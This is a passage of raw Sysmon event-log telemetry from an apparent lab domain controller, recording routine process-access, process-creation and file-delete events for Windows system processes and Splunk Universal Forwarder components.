21:05:55.518{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A233-60D3-9C04-00000000CF01}5624C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021755Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:55.518{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021754Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:55.518{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021753Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:55.518{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021752Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:55.518{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021751Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:55.518{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A233-60D3-9C04-00000000CF01}5624C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021750Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:55.518{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A233-60D3-9C04-00000000CF01}5624C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021749Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:55.519{4DB9351A-A233-60D3-9C04-00000000CF01}5624C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000021768Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:56.978{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A234-60D3-9D04-00000000CF01}4120C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021767Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:56.978{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021766Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:56.978{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021765Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:56.978{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021764Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:56.978{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021763Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:56.978{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A234-60D3-9D04-00000000CF01}4120C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021762Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:56.978{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A234-60D3-9D04-00000000CF01}4120C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021761Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:56.981{4DB9351A-A234-60D3-9D04-00000000CF01}4120C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000021760Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:56.869{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=663A36DA8C92330848FDD3B44A393566,SHA256=A67F74B05BBBF5CB075134FC363482DB45C3324FBB07AE80D45C65E13E115831,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021759Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:56.549{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F9ED663EB92301817DF33C48653061A8,SHA256=48BB60A61028624FA5620702C29B1F4E7243FD2CE14DFF5DACE80462BCAF1026,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021778Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:57.894{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98234AFF4D3ABFB9F5DAA410E97087A2,SHA256=F0342DC4F81939B5E3BD16EC3A2062640252DABC010BE15E2AB65BBACB61191F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021777Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:57.863{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A235-60D3-9E04-00000000CF01}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021776Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:57.863{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021775Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:57.863{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021774Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:57.863{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021773Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:57.863{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021772Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:57.863{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A235-60D3-9E04-00000000CF01}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021771Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:57.863{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A235-60D3-9E04-00000000CF01}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021770Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:57.864{4DB9351A-A235-60D3-9E04-00000000CF01}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000021769Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:57.369{4DB9351A-A234-60D3-9D04-00000000CF01}41205700C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021780Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:58.144{4DB9351A-A235-60D3-9E04-00000000CF01}61607164C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000021779Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:58.004{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=532FCAF3F5182BBE79AE56A159255D9C,SHA256=AB1F71045F58845F50EA1DCADAAED08223A1BC6C219881920F68C0076A299119,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021790Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:59.695{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A237-60D3-9F04-00000000CF01}6472C:\Program 